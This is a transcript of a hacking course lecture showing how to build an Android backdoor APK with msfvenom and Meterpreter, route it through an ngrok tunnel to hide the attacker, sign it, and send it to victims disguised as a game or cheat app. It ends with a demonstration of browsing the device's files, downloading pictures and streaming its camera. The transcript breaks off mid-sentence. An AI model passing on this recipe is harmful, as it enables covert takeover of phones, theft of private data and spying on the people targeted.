Transcript for:
Android Backdoors: Creating, Delivering, and Exploiting Using Kali Linux

Hi. Within this section we're going to discuss how we can create a backdoor so that we can get access to the target device, that is, a phone or a tablet, so that we can discover their files, discover their folders, get full access of the target device, like opening their webcam or camera and accessing their private information. And this is very achievable using Kali Linux, and we're going to see how we can do it with details.

However, there is also another issue that we might want to consider before we start. Once we create a backdoor, once we create a malicious file that lets us access the target computer or device or tablet or phone, it's also wise to think how we can deliver that file, deliver that malicious file, to the target person that is using this phone or device. This is very easy to do in devices like computers, laptops, because you can just email them and someone can download the exe file and double click on them and it will work. But it's not the case for phones, right? So if you are using iOS, for example, then I believe you won't remember any time that you downloaded something from the internet and just double clicked on it and played it. Why? Because we use App Store to install applications on iOS devices like iPhone or iPad, right? So there is an official App Store and we download the applications from here.

So suppose that we managed to create a backdoor, a trojan or a malicious file for iOS. So how are we going to deliver this? So maybe you are curious about this stuff and you found out about a way to install these files to your iPhone, but most of the users, like 99 percent of the users, won't even know that, and even if they knew, they would get suspicious and they won't install your file. So we can play, we can upload it to the App Store, right? So they can download it from the App Store. Yep, it's, it's not possible actually, because Apple checks every App Store application before they release it. So when you develop an application for Apple, you upload it to the App Store
and you wait for something like two to three business days, because they review your application and they see, they look if you have anything malicious in that application. That's not very possible, but even if you manage to hide it from the developers of Apple, even if it gets released on the App Store, they will take it down after a couple of days.

So maybe you have heard that, uh, some kind of trojans or backdoors are circulating in the Apple ecosystem in the past. So how did it happen? So first of all, the restrictions of App Store got stricter and stricter each day, every day, once, uh, they discovered that, um, there are some certain malwares and there are some certain data leakages to the apps. But there are still some ways, theoretically, to overcome this problem. For example, there is something called Apple developer account, and you need to have that in order to upload your apps to the App Store, and you need to pay 100 every year in order to have an Apple developer account. But there is also another thing called Apple business developer account, which is, uh, 300 per year, and once you get that, actually you're allowed to publish your applications without, uh, uploading them to the App Store. So this is for business-to-business applications, so regular people do not see your application, but the people you want to distribute this app to just can download this application on their, on their iPhones or iPads.

So theoretically it's possible to open a business developer account and distribute your app this way, so that people can actually install this in their phones, in their iPads and stuff. But this is costly, and it will be noticed in a couple of days and it will be taken down. So, I believe in the past year, a Russian hacker group managed to do this with exactly the business developer account, and they got noticed in a couple of days and they got taken down. But maybe they had reached their target, I don't know. So it's possible, but it's not applicable to the real world most of
the time. So what I'm going to do instead of this, I'm going to focus on Android backdoors, because you can actually use Android backdoors in real-life examples. Because even if we have Google Play like this, even if we have Google Play to download the applications as an official app store on Android devices, we also have other services, other ways, other ways of downloading applications and installing them on your Android phones as well. So even if we know about creating iOS backdoors, we won't even use them in real life, but if you know how to create backdoors for Android in a perfect way, then you will be able to practice it, of course within legal boundaries, in real life as well. So that is the reason why we're going to do this.

So of course Google Play is a way of distributing your app as well, but it will get noticed and taken down eventually. So what we're going to focus on instead is creating our backdoors and distributing them via emails or WhatsApp or any other messengers, because, um, the people, the users of Android, can actually click on the apk, that is the final product of an Android development, and run it on their own iPhones, or not iPhones, Samsungs or any other Android phones or tablets. All they have to do is actually allow the unknown sources to be installed on their phones, and once they, once they click on this apk file, the phone will ask them if they want to install this or not, or if they want to allow this or not. If they allow it, it will be installed. And luckily most of the Android users actually allow this, because they want to download the other files, other sources, just not depend on only the Google Play. So this is an advantage for us.

So if you're going to test this on your own Android phone or Android tablet, make sure you open these unknown sources as well from the settings, and I'm going to show you how to do that, uh, during the lectures as well, don't worry. Okay, and the reason that we're going to start with this is to practice the Kali Linux a little bit, learn about
Android terms a little bit, so that we can move on to the real thing where we learn about programming and reverse engineering, the app manipulation and everything. So if you have experience on these apk files or kind of creating backdoors for Android before, just be patient with me.

We're going to see how we can use a tool called msfvenom in order to create a backdoor for our Android devices. So the tool that we, we're going to use is called msfvenom, or MSF venom, however you may want to pronounce it. Let me show you how to spell it. Uh, in order to do that, of course you have to open your Kali Linux and you have to open your terminal, and make sure you're ready to write some commands on your terminal. I believe you know how to install Kali Linux, how to run it, how to run your terminal by right now. If you have skipped the previous section, make sure you go back and watch that before coming here.

So over here we're going to use msfvenom, and in order to do that, first of all I'm going to type msfvenom like this and hit enter in order to see the documentation of the msfvenom. Of course we're going to write a lot of parameters, but at this point you don't know any, so first of all I'm going to show you what are those. So we use this msfvenom in order to create backdoors, in order to create some malicious files, and it all starts with payloads. So what are payloads? We use payloads, we use these tools, in order to, uh, select what kind of operating system that we're going to hack in, and what kind of session do we expect back, and what kind of port and way that we should follow to hack in. So maybe you don't know these terms, don't worry, I'm going to explain everything.

As you can see, we can see the payload over here, it's actually dash dash payload or dash p. We need to specify this payload, otherwise we won't get any backdoor created. And remember, msfvenom is not only for creating backdoors for Android, we can create some backdoors, like malicious files, for Windows and other platforms as well. So we need to
specify the platform, we need to specify the technology that we are going to use to hack into the target computer or target device. So I'm going to write it down first and I'm going to explain it part by part to you, and we're not going to finish creating our backdoor during this lecture, we're just getting familiarized with msfvenom so that we can comprehend all of this stuff.

So all you have to do just right now is write, um, is to write msfvenom dash p like this, so msf, um, msfvenom dash p, and then we specify the payload that we're going to be using for this. So you first start with the operating system, like if you're going to do this for Windows, then you write windows over here, if you're going to do this for Android, then you write android over here, okay? So in our case, of course, we're going to go with android, and then you put a slash, and then you write the session that you want to expect to get back. I'm going to explain this a little bit later on in this lecture, but right now just write meterpreter. So it's either pronounced as meterpreter or materpreter, it depends on the country that you live in, I believe, so I'm going to call this meterpreter, and it's spelled as m-e-t-e-r, like this, p-r-e-t-e-r, meterpreter. And then put a slash and then write reverse tcp, reverse underscore tcp. Don't worry, I'm going to explain.

So android is the operating system that we're going to be attacking, right, and you know it, and meterpreter is the session. So this manages a session, manages the connection between the target computer or target device and the Kali Linux or attacker device. So in this case we're going to attack an Android phone, and when the Android phone connects back to us, then meterpreter will create a session. Actually, this payload will create a meterpreter session in which we manage this session, in which we manage this connection, so that we can send some commands to the Android to be executed, like browsing the files or opening the camera of the phone or something like that. We
do this with a session called meterpreter. It's very advanced, it has a lot of commands built in so that you can interact with the hacked device.

And then later on we have this reverse tcp. This is the way that we are trying to hack into, like we could have written over here something like reverse tcp, reverse http. So the reverse means that the connection will come from the Android phone to us, it won't be coming from Kali Linux to the Android phone, because it will be much more detectable if we try to send the connection from here to this phone, but if we send the connection from the Android phone to our Kali Linux, it would be much less detectable, okay? And it is the, actually it's the case for the Windows and other operating systems as well, we don't use bind, we use reverse connections when we try to create backdoors. So tcp is the port, is the gate that we are trying to go in. We could have used http or https as well. In my trial and errors I found out that reverse tcp is the way to go, so I'm going with reverse tcp. If it doesn't work for you, you can just try to create something with reverse http or https as well.

So once we do that, um, we're going to specify a little bit more parameters within the couple of following lectures, and it will create a backdoor, a payload, for us. Once we send this file to the target computer or target device, the Android actually in this case, it will run. Once the user taps on this file, it will create a session between Kali Linux and the Android phone, so that we can easily access all the files and folders and command system inside of those phones or those targets.

We're going to discuss the IP address that we're going to be using to create this backdoor, and some other very interesting concepts regarding this IP issue over here. So we need two more parameters in order to create this backdoor, which is, uh, LHOST and LPORT. They stand for local host and local port respectively. So it means the host, the IP address that we're going to be expecting this session to come,
and LPORT means the port number that we're expecting this session to come as well. So this will be something like 192.168.1.1, and the port will be something like 8080 or 4040 or something like that.

So what is the issue? Why don't we just give the IP address and wait for the connection to come over here? So there are actually more than one IP address that we can give over here. So if you have ever watched a section like this or a tutorial like this on YouTube or any other websites, most probably you will see, you would see something like the local IP address is put over here. Actually, there is more than one IP address. If you go to google.com and search for "what is my ip address", then you're going to get your public IP address, which is the IP address of your router, your modem, okay? This is not the specific IP address of your current device, this is the IP address of your router. So if you go over here and say "what is my ip" on Google, it will give you some kind of this public IP address. I'm blurring mine so that you won't see mine, but you can just click whatever website that you want to use over here, like whatismyipaddress.com, and you will find out your own IP address, and this is your public IP address, okay? This is the router's IP address.

I'm going to explain what public means, what local means in a minute, but the problem over here is that if you give that public IP address to this backdoor, then it's not safe for you, it's not safe for the hacker, because in real life, if you, if a hacker commits a crime, they can actually analyze the backdoor and they can see the public IP address on that backdoor, so that they can try to locate the location of the hacker with that information. So hackers use other platforms, other tools in order to overcome this problem in real life. In order to be realistic, we're going to use that information, use those tools in our example as well. So I'm going to explain what a local IP is and what a public IP is with a detailed presentation to you, so it won't be some
kind of vague thing in your head.

So when we try to visualize how the internet or how networks work, we can use this chart. So there is a router in your home, and you have some kind of devices like phones and MacBooks or iMacs or computers or laptops, and they're all connected to that router because they want to go to the internet. So when they try to go to google.com, for example, they send some requests to the router, and the router sends some requests to the internet, they get some responses back, and the router forwards those responses to the related device, okay? So this is how requests and responses work.

But over here we only have one public IP address, which is, uh, 85.100.25.149 in this case, but also we have some local IP addresses as well. So these local IP addresses are assigned by the router with some kind of tools to the individual devices in your home or in your network, okay? So what you see as 192.168, or 10 or 11 or 12, represents the local IP address of the individual devices. So the router generally gets the first IP address unless it is configured otherwise, so it is 192.168.0.1. So they use these IP addresses and something other called MAC addresses in order to circulate this information with the network, in order to have this kind of communication with the network, okay? But we use public IP addresses in order to communicate with the external world. So if you guess that, uh, every individual device in this house has the same public IP address, then you're absolutely right. They have different local IP addresses, but they have only one public IP address.

So if you want to get a connection from some outer world, you have to give them your public IP address, which is not safe because it's detectable, it's trackable, okay? And also you have to do some kind of port forwarding in this case. Even if you are willing to share your information with a backdoor, then the router has to know which device it should forward the information to, in order to forward the, uh, related information. For example, you
hacked into the Android, Android gave you the connection back, you got it from the router, but the router should know whether it should forward this connection to iPhone or iMac or MacBook or Kali Linux or any other device in the house, and this operation is called port forwarding. It's pretty easy to do that, but it causes some problems with some kind of internet providers.

So in order to eliminate this port forwarding, and in order to eliminate the safety issue that is brought to us by sharing our public IP address, we're going to focus on something called tunneling, okay? We're going to use some services, and we're going to make that service port forward, or forward that information, to our computer, to our Kali Linux directly, so that we won't be sharing our public IP with the backdoor, with the malicious file that we are trying to create, and also we're not going to deal with the port forwarding at a router level in our own house or in our own network. So that's actually how hackers in the real world work as well.

So let me show you some kind of examples regarding this local IP as well, so that you will comprehend it in a better way. So what you can do, you can open your terminal inside of Kali Linux, I'm going to open a new tab, and write ifconfig, ifconfig, and what you see over here is 10.0.2.15 or something like that, and it's our local IP address. So I'm not going to write 10.0.2.15 over here, I'm going to write some other thing that I'm going to show you in a minute. But maybe you, you may think that, uh, what is 10.0.2.15, you said that 192.168, something like that. So, uh, 10.0.2 generally refers to NAT network IP addresses. So we're using some kind of virtual network inside of our VirtualBox, remember, we are using NAT network, so we have this 10.0.2.15. If we use some kind of USB Wi-Fi card to connect our Kali Linux directly to our router, then we would get something like 192.168.
Okay, and it even, it doesn't even matter what kind of IP address that we have, uh, if we, if we have a working local network. So maybe you can see something like 172.168 as well rather than 192, just don't be surprised, it's possible. And over here, as I said before, we're not going to use that information in order to create our LHOST and LPORT, but rather we're going to use something called tunneling. But it's essential for you to understand this information so that you would understand what we are trying to do with the tunneling service in a minute.

Okay, we're going to discuss tunneling services in order to overcome the problems that we have seen in the previous lecture. So in order to do that, we're going to use something called ngrok dot com, okay? So this is a tunneling service, but what is a tunneling service and why do we want to use one? Of course we're going to use it for our backdoor, but there are other various uses in order to leverage this kind of tunneling services in real life. For example, in our Kali Linux we have actually a web server, okay? You can actually host a web service in your Kali Linux. So let me clear this tab right now, we're going to write it later on anyway. So I'm going to write service apache2 start. So when you do that, it will run a web service in your Kali Linux. So actually there is a web server going on in your Kali Linux right now, and you can change the content of it in order to host a web server or, I don't know, website in your Kali Linux.

For example, if you go to your file system, okay, to your folders, I will show you where your website is right now so that you can edit it and use it if you need it. We're not going to need it anyway, but I'm going to show it to you so that you know how to use it. So if you open your file system, I'm going to wander into the file system and a directory called var, var, okay? So if you go over to this var, you will see a folder called www, which is your website, and you're gonna have to double click on this
html, and you will see this index.html. So index.html is the file that you see when you browse into a website, so whatever is written over here will be displayed if someone browses to your website. Right now I'm running this web server, but since my Kali Linux is on the NAT network, only the files, or only the computers on the NAT network can actually see those files, see the website that we are running. But we can use ngrok to open this website to the world as well.

So if you open your browser, okay, in your Kali Linux, like your Firefox, and if you run ifconfig to see your IP address, you will see mine is 10.0.2.15. I'm going to write 10.0.2.15 in my browser, and you will write your own IP address, and what I will see is the content of my index.html. As you can see, this is a default page that is created as a test or as a default website, and I'm now seeing it. If I had another machine on my VirtualBox, I could have written 10.0.2.15 to any browser from that machine and I can reach this website as well. And if I use ngrok, I will be able to open this website to the public.

That's not what we are looking for, but a tunneling service lets us connect our local IP addresses or local machines to the internet using their own services, so that we can actually gather the information to the ngrok IPs from the backdoor, from the Android phone, and forward that information to the Kali Linux using the same system, okay? We're going to use it for this reason, but remember, the tunneling services may provide much more broader or greater advantages in given time. So what we want to do is to set ngrok up in our computer so that we can reach their services, so that we can actually forward that information when it comes to ngrok to the Kali Linux, so that we can create our session, so that we can, uh, hack into the Android phone and get access to their privileges, browse their files and folders and everything. So that's what we're gonna do. So first of all, I want to go to ngrok again and download some files and folders and
set up some account information with ngrok, because we, we will need that information. Uh, you won't be able to use ngrok without creating any account, okay? So what I would suggest is to close this down, because we are done with it, and minimize this tab and open the Firefox, and then the next thing we're gonna do, we're going to write ng like this, ngrok.com over here, and once we do that, we're going to register for an account. So you see login and sign up buttons over here. Of course this theme or some kind of user interface may change over time, but they will always provide some kind of login or sign up, register options. So you want to register for an account. Don't worry, it's free by the way, but you, you're going to have to provide some kind of email and other stuff in order to create an account.

So I already have an account, so I can go to log in, but I'm going to show you how to sign up as well. So let me click on sign up, and as you can see, you will only provide your name, your email, and email again, and a password, and it will create your account for you, so it's fairly easy. So rather, I'm going to log in with the previously created account of mine, and it will direct me to the same page that you're going to see when you sign up. So I made up an email for this, like jquerox at gmail.com, and the password is something like this. Let me save this, um, yeah, let me update this, and it will ask me to complete an installation or setup process. So this is what we are looking for.

As you can see, ngrok can be used in macOS, in Windows and in Linux as well. Since we are in Linux, we are seeing the button for Linux, but if you want to use this in Windows or in Mac for some reason, of course you're allowed to use it. But I'm going to download for Linux, so I'm going to click on this button and I'm going to say save file, okay? It will download the file for me, and then of course I'm going to have to unzip it, because it will be kind of zipped. You can use the unzip command in order to unzip it, or you can just right click
on it and unzip it yourself. So let me open the downloads folder and show you what I mean. So open your downloads folder from your file system, okay, it should be under root, so root, downloads. Once you double click on the downloads, you will see the ngrok downloaded file over here. So this is a zip file, and Kali Linux also has its own archiver, so if you double click on that you can see the ngrok, you can just, uh, drag and drop it to your own folder like this, okay? So it will be unzipped. Of course you can use the unzip command as well in order to get familiarized with Kali Linux a little bit more.

So after that, let me come over here. Uh, you're gonna have to connect your account. So since you have created this account, it will give you this kind of an authentication token. So yours will be different from mine, so you're gonna have to copy it from your own account. I'm going to close down my account, so don't try to write my own token over here, create your own accounts and just copy this command from here. So I'm going to copy everything and I'm going to paste it on my terminal so that it will be authenticated, so that it will be ready to use. And don't skip anything, just make sure you get the whole line over here, okay, because otherwise it won't be authenticated and it won't work.

So once you are ready, you have to open your terminal one more time and, uh, change your directory into the downloads folder or any other folder that you have downloaded your tool into. So mine is in downloads, so I'm going to say cd downloads, and now I'm inside of downloads. If I just paste this selection or clipboard over here, it will run ngrok and it will authenticate me using the token, okay? Now my token is saved, I'm free to use ngrok services. So that's how you install and that's how you set up your environment for tunneling services. Next, we are going to be finally ready to create our backdoor for Android devices using these tunneling services.

So if you go to the documentation of this ngrok.com, you will see a lot of
usages and a lot of commands that you can use, you can leverage in your own environment. As you can see, in order to create some kind of connection, all you have to do is just specify the connection type and the connection port that you want to use. I'm going to show you what you can do, or what you have to do, in order to make this work, don't worry, but if you want to use ngrok for some other special occasions later on, make sure you read this documentation, because it's very useful actually. For example, in here they're trying to expose a web server on port 80 of your local machine to the internet, and that is what we have seen in the previous lecture when we tried to start the web service of Apache. But that's not what we're going to do right now, we're going to use this for sending the connection from the Android to ngrok.

So in order to do that, of course, we're going to use the same thing. I'm in my downloads folder one more time in my terminal, and I'm writing dash ngrok tcp and a port number. So maybe you can think something like that, uh, yeah, you're talking about ports a lot of times during this training, but you didn't explain what a port is, and you're correct. So we are sending some requests and getting responses when we deal with internet operations in our daily life, so every connection, like going to google.com or receiving that connection from the Android phone, requires some sort of a gate, some sort of a port, to be processed on. So every connection uses its own, um, specified gate, like, um, 80 for http requests or, I don't know, 22 for ssh requests, and for mail requests we have a lot of different ports, for some kind of other special services or special connections we have other ports. So we have some respective gates, respective ports, for different kinds of connections, and firewalls actually try to observe these gates, observe these ports, so that they won't be left open for any kind of incoming malicious connection, okay? So we're going to use a port that no one else is using,
something like 4242 or any other thing like 5555, and if it doesn't work for you for some reason, you may choose to use another port. For example, I'm going to write 4242 over here, and since we do not have any kind of firewall in our Kali Linux, it should work fine. So I'm going to hit enter, and as you can see, it started to work. And we're not going to come across any kind of firewalls in Android as well, so most of the time this 4242 will work out for you, but if it doesn't, just try 5555 or 6666, okay?

So as you can see, it's now started and it's kind of doing a forwarding operation, which is, uh, what we are looking for. As you can see, we are forwarding this tcp dot ngrok dot io with this port to our localhost. So this address and this port would be different for you, may be different for you. I have 17, uh, 197 over here, and in the localhost of course we have our specified port over here, like, like 4242, but this will change for you. But we're going to use this, so I'm going to use this as a local host and a local port in my msfvenom. Why? Because remember, we want to direct the connection from the Android phone to ngrok, and then later on from ngrok to our own localhost, to our own Kali Linux machine, using this service. So that is exactly what we are doing right now.

So what I'm going to do, I'm going to give this as an input to LHOST and give the port as an input to the LPORT in my msfvenom. So you have to do exactly the same in order to succeed. So this would be different for you, even the address would be different for you, so make sure you copy your own, not mine. So over here I'm going to use this, and I'm going to use 17197 as a port, and this will receive the information and forward it to me once it comes. So don't close this down, just open a new tab from the file menu and say new tab, okay, because if you close it down, the service will stop. So open a new tab and write the msfvenom command that we have written before. So as a payload parameter I'm going to specify
android meterpreter and then reverse tcp, okay, the reverse underscore tcp, and then later on we have to specify the LHOST and say equal to, and this will be equal to the, um, 0.tcp.ngrok.io I believe, and the LPORT will be seven, um, thousand and, seventeen thousand one hundred ninety-seven. So I'm just going to copy and paste those, um, 0.tcp.ngrok.io, so it's easy, I can write that without forgetting, I suppose, 0.tcp.ngrok.io, and then the port will be, so 17, let me see it, yep, 17197, so 17197. Here we go, now we are okay.

And then we specify where to put this, um, payload, where to put this apk file that we have been trying to create. In order to do that, you can just write the results like dash r and specify the folder that you want to put it, so that you can access it easily and you can forward it. So I'm going to say r, okay, with a capital R, and say this greater sign, it means that just write the result into this folder, into this location, okay? So R greater than slash root slash downloads or documents or any other folder that you may want to put this. So I'm going to say ngrok test.apk and I'm going to put it inside of my root folder directly. Of course you're more than welcome to use another name for your apk, but don't forget to specify that apk extension at the end of this. I'm just going to call this test because we're testing it, okay? In a real-life example it would be something like game dot apk or, I don't know, super cool application dot apk, because you're going to send it to the victim next. So here you go, I believe it's now created for us. Let me minimize this and let me go to the root folder, and here we go, we see the ngrok test.apk. So this is the exact file that we are going to send to the victim, and once, once the victim installs this, we're going to

Now that we have created our malicious apk file, the next thing to do is actually, we're going to send it to the victim, but once they click on it, once they run this file, we will get the connection. So before we do that, we need
to be prepared, we need to be ready for this connection, and the way to do that is to listen for incoming connections on our Kali Linux. So whenever you want to hack into some computer or some device, you should listen for connections, so that's how you get a session out of this hacking, okay? Luckily we have a tool embedded in Kali Linux for that. As you can see, my ngrok is still working on one of the tabs, and I'm not going to close this down because it will kill the service, okay? I'm going to leave this as it is, and this will forward me the connection. Once the victim clicks on the apk file on their Android device, it will forward to, it'd forward the connection to ngrok and then ngrok to me, and I should be prepared for this.

So I'm going to run this command, service postgresql, or SQL, however you may want to pronounce it, and start. So this will start a database service called PostgreSQL, and the reason why I'm starting this is because I'm going to use something called Metasploit, okay? Metasploit uses this as the, as its database, and Metasploit is a tool commonly used in penetration testing. So you can write msfconsole and hit enter in order to start Metasploit. So with Metasploit we can actually listen for incoming connections, we can find a lot of exploits that can work on some of the vulnerabilities that are commonly found in servers or computers. We are not interested in servers or computers in this course, but we are interested in telephones and tablets or mobile devices, but we can use the listening feature of Metasploit as well in order to receive this session.

So after you run msfconsole, you will see a screen like this where you will see the msf console, okay? That's how you write commands inside of Metasploit. Once you see that, you can just begin typing msf or Metasploit commands, it's fairly easy to use actually. As you can see, we have a lot of payloads, a lot of exploits embedded in Metasploit as well, but we are particularly interested in a, a module called, um,
multi-handler. So this module does exactly what it sounds like: it's a multi-handler, a multi-purpose handler. We can use it to listen for incoming connections, and in order to do that I'm going to write this: use exploit slash multi slash handler. Okay, this is how you specify the modules inside of msf, inside of Metasploit. So we are interested in this multi-handler module. So once you hit enter it will enter into this module and then you can see the options and features of the specific module. So the first thing to do is to set the payload to the exact payload that you have written before, because as I have said before you can create many backdoors for Windows or Linux or Android and other operating systems as well. Since we have used Android I'm going to do the same thing over here as well. So I'm going to say set payload and then I'm going to write the exact notation, the exact same syntax that we have written down before, which is android slash meterpreter slash reverse underscore tcp, and this is reverse underscore tcp. Once I write that I will hit enter, and as you can see it has already assigned the payload to be this way. So when I say show options it will show me the options of that specific payload and specific handler. So we have to specify the LHOST and LPORT, but this time it's going to be a little bit different than before, because as you can see we have specified this to the backdoor, because this is where we will receive the backdoor's incoming connection, but also in Kali Linux we will receive the connection in the localhost and in this port. So this time I'm going to go for localhost, which is 0 0 0 0, and for the port I'm going to use 4240. So don't get confused over here: we have used the left-hand side in the backdoor and we are using the right-hand side in the listener part. So in order to set a value over here you have to say set, the value name and the value itself, like set LHOST and set LPORT 4242, like this. Okay, once you do that you can say
show options and you will see the input that you have given is already over here. So now we are ready to be listening for incoming connections. So since this is a payload or exploit kind of tool we have to say exploit in order to start listening, and I will add this dash j and z in order to listen in the background. So this will be running in the background but this will not lock our terminal, so we will get notified once we have the connection back from ngrok and we can just interact with the session. Okay, so right now all I have to do is just transfer this ngrok test.apk to the victim machine. So there are a lot of ways to do that actually: you can just send it through WhatsApp, you can just send it with email, you can just find a lot of different ways to transmit this, maybe you can just upload this to a server or upload this to any kind of file transfer website and ask the victim to open this. So it goes like this: you just email someone. Hackers, actually malicious hackers, bad hackers, email people and say that, yeah, we have this kind of tweaked game, you can do cheating with this apk if you want, and they download it and they click it and then they get hacked, obviously. And the way to do that is actually to find a file transfer service, which is commonly available on the internet, but I'm going to go for files.fm, which is essentially something like wetransfer.com. But apk files can be blocked in some of the services, but I found out that files.fm actually allows transferring dot apk files, so maybe you can try that, but if you cannot make it work you can always try other services as well, or you can try to email or send it through any other communication channels. So as you can see I have uploaded my file and it has given me a link. So the next thing to do is actually sending this link to the victim, but for demonstration purposes I'm going to go for my local machine, which is my host machine, my Mac, and I'm going to try and see if I can download this
file to my Mac, okay. I suggest you do the same because we are not done here actually: we're going to need one more step before we send this link to the victim. We have to sign this apk as well before we send it. I'm going to explain what this is, don't worry. And here you go, I believe we have managed to download it, and here you go, our apk file. So one last thing to go before we make this happen, and that is signing.

Now we have created our apk, there is one last thing that we should do before we send it to our victims. So we need to sign this, and by signing I mean having a signature identifying us as a developer. So without doing this some of the devices, actually most of the devices, won't accept this apk and won't run it. You may be able to install it on your own machine but you won't be able to run it. So in order to avoid this problem we're going to sign it. So you have transferred this apk to your host machine, which is maybe Windows, which is maybe Linux or which is maybe Mac. So I'm going to show you a way to sign this, and if it doesn't work I'm going to show you some alternatives so that you can actually do this process. So if you're on Windows click on the Windows sign and write cmd in order to open the command prompt, and if you're on Mac just open your terminal, and if you're on Linux of course open your terminal as well. So we need to run some commands and I'm going to show you what those commands are, and remember sometimes it doesn't work; I'm going to show you some alternative ways to fix this problem or some other tools to overcome the signing issue. So this is a long command actually, so I have it in my notes. I'm going to copy and paste from my notes, and of course I'm going to include those codes in the resources of this lecture as well. So this is the code that we are going to run, this is the command. So it uses a tool called keytool and it generates a keystore file, which is a file identifying the id of the developer. So it will ask for some information like your name,
your country and some other stuff, and it will ask for a password as you can see. So give some password and give this password one more time, and when you see this first name, last name and stuff you can just skip it by hitting enter, and for the last time you will see something like no, and just write yes and hit enter. So if it doesn't work for you don't worry, I'm going to show you an alternative, remember. So this created a keystore file, but since I'm not in the desktop I should have written cd desktop and then run this command. I am in my users until sam, so I believe it created the file over here like this. So I'm going to move this file to my desktop. So it's essential that you have these two files side by side. It doesn't matter if you're on desktop or in your downloads or your own documents, just cd into that folder from your terminal. Okay, so I'm going to cd into the desktop and then later on I'm going to run the second command. So copy and paste the second command from the resources of this course, okay, from this lecture, and we are going to use this keystore to sign this apk, and this jarsigner tool does exactly the same. All you have to change is the name of this file, so if this is ngrok test.apk for you, you don't even need to change that. It will ask you for your password; just give the same password and hit enter, and now this is signed. So if it didn't work out for you, what can you do? So the reason why it might have failed for you: you need some JDK tool in order to run this jarsigner, okay. JDK stands for Java Development Kit. So let me show you, let me go to google.com, you don't have to do that right now. So let me search for jdk and here it is, so this is the Java Development Kit, and in fact two lectures later on we're going to install this to our machines and we're going to install some IDE called Android Studio and we're going to run some Java code as well, but right now we don't have this. So an alternative tool is to find an apk signer on Google Play like this. As you can see, if you
search for apk signer you get a lot of results. So do that within your own Android device, okay. So search for apk signer and just download the first one that comes up. That way, if you download your apk from files.fm to your own phone or tablet, Android tablet, okay, and then if you use this apk with the apk signer app that you have downloaded, then you will be able to do exactly the same thing that we have done with the commands. Okay, this tool does exactly the same thing. So if you download this and if you download the apk you can just sign it inside your machine as well, then you can upload it to some kind of server or files.fm one more time and then send it to the victim. And if you don't have any Android device at all you can use something called an emulator, a simulator, okay, an Android software that simulates the actual Android phones, and you're going to see how to use it in the next section as well. In this section we're just warming up, we are getting you familiarized with the concepts of Kali Linux, of backdoors and of hacking as well. So we don't have Android Studio, we don't have the JDK right now, so you may encounter some kind of difficulty like the jarsigner thing, but you can overcome this with the apk signer. Obviously after you do that of course you can just go to files.fm one more time or any other service and upload your signed apk. So if this doesn't work out for you just go to the next section, download the JDK and then try one more time. Okay, so if it did work out for you I suggest you don't delete this keystore, or if you have downloaded apk signer don't delete that application, because we're going to use this a lot during this training. But I promise you it will work out eventually after you download the JDK and SDKs of Android Studio, so don't worry about that.

Now we are ready actually. I have sent those links to the victim and I have my ngrok working on my Kali Linux, I am listening for incoming connections with the Metasploit tool, and I believe we are ready to test this. So all
you have to do is just send the link to your Android device, and again if you don't have any Android device to test this on, wait for the next section where you will learn how to use the Android emulator. So here we go, on my own Android tablet I'm downloading this apk as you can see, and once it's ready it will be ready in the downloads folder like this. So if I click on the ngrok test.apk it will ask me for some kind of permissions and I'm going to say install, okay. So this will install the application on my tablet, and if I say open then it will open the application, and at the Kali Linux as you can see the Meterpreter session one opened for me. Now I don't see anything on my tablet right now, so if I was a victim I would have thought, yeah, this app doesn't work, but in fact we managed to hack into that Android device. As you can see we have the session over here in Kali Linux. So if you hit enter, now the session is opened. In order to reach those sessions you should run sessions dash l, so this will list the sessions. As you can see we have only one, and it's an Android device, and you can see the connection is coming to my localhost. So if you say sessions dash one, so this is the id of the session, it will go into the Meterpreter session. As you know by now, Meterpreter is the session handler for us. So if I run sysinfo it will display the information of the victim system like this. So this is an Android device, it runs on the 4.4.4 version, and if you run help it will display the available commands for you to run, and in fact you have a lot of commands, a lot of options in Meterpreter sessions. So this is the beauty of the Meterpreter: you get to see what the options are and you get to just run them and see the result back in an instant, okay. So you can actually browse through this help documentation of the Meterpreter so that you can understand what's going on and you can read the descriptions like this. So I'm going to show you some of the most popular ones, and you will see there is
a section dedicated to Android commands over here, like you can dump the call logs, you can dump the SMS messages, you can try to send an SMS actually, you can just set the audio mode, you can just set the wake lock or something, and you can actually run ls and browse through the file system of the Android device as well. For example let me go to cd dot dot and cd dot dot one more time, and I believe we are inside of the data data folder right now. If you're in someplace else you can browse to the data data as well, right. And let me run pwd, yep, I'm inside of data data. So let me go to some other command, some other folder over here, let me go to the root folder and run ls to see my options first. Yep, here you go, we have a lot of files and folders over here. I can try to find some sensitive folders and files by just browsing through this file and folder system of the Android device. Over here I can download anything I want, I can try to upload new files to the system using this Meterpreter session, and the commands are very basic, you're just going to have to read the description, but it's upload and it's download followed by the file name, okay. So once you get the session it's very easy to move on from here. For example let me go into sd card, cd sd card, okay, and if I run ls I will see the contents of the sd card, like you can actually reach the music, downloads, movies, like you can go to downloads for example or pictures and try to see the pictures of the user. So let me run ls to see if I have any. Yeah, I have something called ik screenshots, I believe. Yeah, let me try to download this and you will see what I mean. So download ik screenshots, and it will download this file for me and save it to my root folder, okay, and you can try to display this inside your file and folder system inside of Kali Linux obviously. Then let me go back a little bit and let me go into some other folder like downloads, okay, I believe it's named download, yep, so download, and let me run ls. Here you go, we see
our own file, ngrok test.apk. So these are files that our user has been downloading all the way through, right. So as you can see we managed to hack in and we are browsing through the file and folder system. This is very cool. So there are actually other commands like sending SMS or getting the calls, but I don't have any kind of SIM card inside of my tablet; it's not even a phone, it's a tablet like an iPad, okay. So I'm not going to be demonstrating those examples, but if you're doing this for a phone of course you're more than welcome to test this on your own time, just sending SMS or trying to get the call logs or something. But as you can see we have something called webcam stream, and this is one of the most popular commands. You can use this webcam stream to open actual webcams on computers, but on mobile devices it actually opens the camera of the related device, like if you're on a phone you can actually see what's going on around the user, around the victim, by using this command. So let me display this. Obviously I have a camera on my tablet, so let me run webcam stream, with only one m, okay, let me delete this and hit enter. So this will start a service for me and it will give me some kind of a web link or something, some html file for me, and I will have to open it. So don't close this and don't hit any other word or any other key on your keyboard, so this should be running on its own, okay, and copy the selection. So as you can see this is running some kind of html file on my root folder, and if you go to your root folder with your file manager you will see that html file, but rather than seeing it, if you open any Firefox tab you can just paste it, okay, and you can just open that html file on your own machine, and now I see my tablet camera or my phone's camera. As you can see this is my garden, I'm just holding up the tablet so that you can see what's going on, and let me try to go into the image as well, but I
